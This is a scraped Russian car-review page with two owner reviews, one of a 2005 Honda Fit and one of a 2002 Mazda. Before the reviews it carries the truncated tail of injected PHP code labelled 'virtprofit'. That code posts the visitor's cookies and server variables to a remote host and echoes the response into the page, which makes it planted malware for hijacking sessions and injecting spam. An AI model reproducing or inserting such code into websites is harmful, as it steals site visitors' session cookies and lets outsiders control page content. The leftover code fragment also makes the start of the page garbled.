array("header"=>"User-Agent: PHP Modules virtprofit\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($virtprofit_result) echo $virtprofit_result; ?>

Присланные отзывы за неделю


Прислал: Никита
Год: 2005
Эксплуатирую: 8 месяцев
Отзыв:


Итак, всем привет. Хочу рассказать про автомобиль девушки своей. Ее интересовало только, чтоб внешне «была милашкой» у да ладно. Вскоре после долгих исканий и так чтоб согласно выделенному бюджету мы купили Хонду Фит 2005 года выпуска, светло серебреного цвета, в общем, да, довольно милый автомобиль.
Что мы имеем, собственно. Машине уже 8 лет, пробег родной, состояние в принципе подтверждает этот факт. Состояние в принципе «сойдет». Конечно многое будем менять: клипсы, подвесочки, комплектацию дополним. Что есть: мотор 1.3,86 лошадок, привод передний, вариатор. Что порадовало: резиновые коврики в салоне, майки чистые новые на сиденьях, магнитола японская, с навигацией и прочим.
Экстерьером мы остались довольны: удачный дизайн. Внешне тоже все аккуратно и стильно, огромные фары головного просвета тянуться с переднего бампера аж до лобового стекла



Прислал: Богдан
Год: 2002
Эксплуатирую: 4 года
Отзыв:

Обладателем Мазды я стал случайно, но с тех пор ни о чем не пожалел. Изначально машина из-за своего первого владельца несколько лет просто простояла на таможне, так как сюда приехала из Японии. Затем приехала в Иркутск, где я ее благополучно приобрел. Даже после четырех лет владения данным экземпляром вижу в ней только хорошее. Внешне она выглядит сравнительно небольшой, что для передвижений по городу только плюс. Салон – первоклассный. Сидения – просто королевские, думаю они меня и покорили с первого взгляда.
Кстати, внутри машина кажется намного больше ,чем снаружи. Расстояние между сидениями более, чем приличное. За рулем себя комфортно чувствует и человек очень высокого роста. Нет нужды подгибать колени или втягивать ноги, вместо этого можно расположиться по-королевски, и не париться о пустяках. Задние сидения ничем не уступают передним, она расположены немного выше по уровню, что дает возможность наслаждаться поездкой, а не трястись, обхватывая колени руками. На трассе машина ведет себя более, чем уверенно. Лично убедился, что сто семьдесят для нее далеко не предел. При чем на качестве работы двигателя это никак не сказывается, никаких тебе рывков или посторонних звуков, плюс еще есть полная шумоизоляция.



Return to Top ▲НА ВЕРХ ▲